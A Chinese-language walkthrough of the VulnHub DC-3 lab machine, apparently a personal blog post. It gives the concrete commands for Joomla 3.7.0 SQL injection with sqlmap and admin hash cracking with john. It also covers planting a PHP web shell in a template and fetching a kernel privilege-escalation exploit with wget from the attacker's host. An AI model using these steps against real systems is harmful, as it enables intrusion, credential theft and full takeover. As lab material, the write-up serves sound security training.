分享

红队打靶 | vulnhub系列:DC-3

 zZ华 2023-07-04 发布于广东

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。


DC-3打靶记录

环境下载

https://www.vulnhub.com/entry/dc-32,312/

一、扫描主机确定IP

arp-scan -l

图片

IP为 192.168.117.143

二、扫描端口

nmap -sS -T4 -A 192.168.117.143 -p 0-65535

全端口SYN 半链接扫描

图片

ok的只有个80端口 登录看看

三、访问80端口

图片

joomla的

利用kali自带扫描器joomscan 没有的可以安装一下

apt-get update
apt-get install joomscan
joomscan -u http://192.168.117.143

就出来两个东西

版本号 和后台管理的目录
图片

找找有没有可以利用的漏洞

searchspolit joomla 3.7.0

图片

肯定不用xss啊选择sql注入

cat 一下文件看一下poc

图片

利用神器来脱裤

sqlmap -u 'http://192.168.117.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml' --risk=3 --level=5 --random-agent -p list[fullordering]

图片

接下来就脱裤 找admin密码

图片

经过加密了

用john来破解密码

john dc-3

图片

得到密码 去登陆

找文件上传点放马子

四、getshell

图片

找到文件上传点

写马 然后蚁剑连接

图片

然后这个bzz3模块的默认地址可以百度
/templates/beez3/ftshell.php

图片

开启虚拟终端下一步来提权

图片

五、提权

既然没有sudo 呢就看版本来提权

查看版本

cat /proc/version
uname -a

图片

然后查找提权的poc

图片

图片

然后在本地起一个http服务 让服务器下载后压缩执行就行了

python -m http.server 8000
wget http://192.168.117.134/39772.zip

图片

下载成功执行脚本提权

./compile.sh
./doubleput

图片

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多